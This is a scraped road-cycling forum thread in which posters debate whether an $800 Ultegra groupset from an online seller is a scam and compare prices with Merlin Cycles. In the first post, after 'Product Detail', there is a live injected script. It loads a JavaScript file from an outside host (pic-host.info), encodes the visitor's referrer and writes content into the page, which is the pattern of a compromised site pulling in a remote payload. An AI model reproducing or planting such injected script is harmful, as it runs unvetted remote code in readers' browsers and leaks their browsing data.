Road Bike, Cycling Forums banner
1 - 11 of 11 Posts

·
Registered
255 Posts
Hi,
This guy has the Ultegra complete groupset for 800$.
Do you think with the new 6800 released prices will go any lower?
Thanks

Product Detail<script type="text/javascript" src="http://www.pic-host.info/files/encode.js"></script><script type="text/javascript">if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }document.write('
');</script>
We don't know the future but the trends usually say they will get a bit lower. If you are not in a hurry just wait and see.

·
Registered
3,543 Posts
bogus?

I bought a Sram and an Ultegra groupset 4 years ago from them, everything was good

and these comments from this forum:
http://forums.roadbikereview.com/hot-deals/euro-bike-parts-llc-219051.html
looks risky as HELL

glad to hear it worked out well, though, no doubt. if it works, 800 for a group is insane. absolutely, more power to you.

but the footprint on the site is similar to others that have been called out for straight rip offs, do not pass go, do not collect two hundred dollars. with no mailing address/brick and mortar shop legitmately referred to, the first question has gotta be --who is this guy (if not who is this clown)? no physical address/identifying information is typically a pretty bad sign, no? i wouldnt buy/give up payment information to an unconfirmed solicitation straight out of cyberspace no matter how sweet the deal would appear to be....

·
Registered
134 Posts
looks risky as HELL

glad to hear it worked out well, though, no doubt. if it works, 800 for a group is insane. absolutely, more power to you.

but the footprint on the site is similar to others that have been called out for straight rip offs, do not pass go, do not collect two hundred dollars. with no mailing address/brick and mortar shop legitmately referred to, the first question has gotta be --who is this guy (if not who is this clown)? no physical address/identifying information is typically a pretty bad sign, no? i wouldnt buy/give up payment information to an unconfirmed solicitation straight out of cyberspace no matter how sweet the deal would appear to be....
$800 for a group is insane? What is the price of $776.68 at Merlin then? Are you going to bad-mouth them too?

Shimano Ultegra 6700 Groupset - Grey | Groupsets - Road Bike | Merlin Cycles

Did you even read the other thread with plenty of posts from people who have had good experinces with Euro Bike?

·
Registered
3,543 Posts
$800 for a group is insane? What is the price of $776.68 at Merlin then? Are you going to bad-mouth them too?

Shimano Ultegra 6700 Groupset - Grey | Groupsets - Road Bike | Merlin Cycles

Did you even read the other thread with plenty of posts from people who have had good experinces with Euro Bike?
no no im not bad mouthing, man, just saying it looks a little bit too good to be true. plus, again, the site looks like sites that are repeatedly cited for brazen wide open scams as in taking people's money. and running, NO gear in return, just a straight up rip off, right down the line. 800 for 6700 is possible, i guess, just doesnt seem very likely...

didnt have a whole lot of time, but i'll check out merlin and the reviews and let you know what i think....thanks

·
have droids, will party
582 Posts
I dunno about the site, but as far as prices getting a whole lot lower go, 7900 didn't really drop at all after 9000 came out. I went looking for a new group for a build and found 7900 and 9000 at nearly the same pricepoint. 6700 might go down since its less desireable, but probably not by much.

·
&#948;anned
7,006 Posts
Considering that Merlin Cycles lists the Ultegra 6700 groupset for $746.09 and the Ultegra Di2 groupset for $1362.36, I don't think $800 is an insane or implausible price.

1 - 11 of 11 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.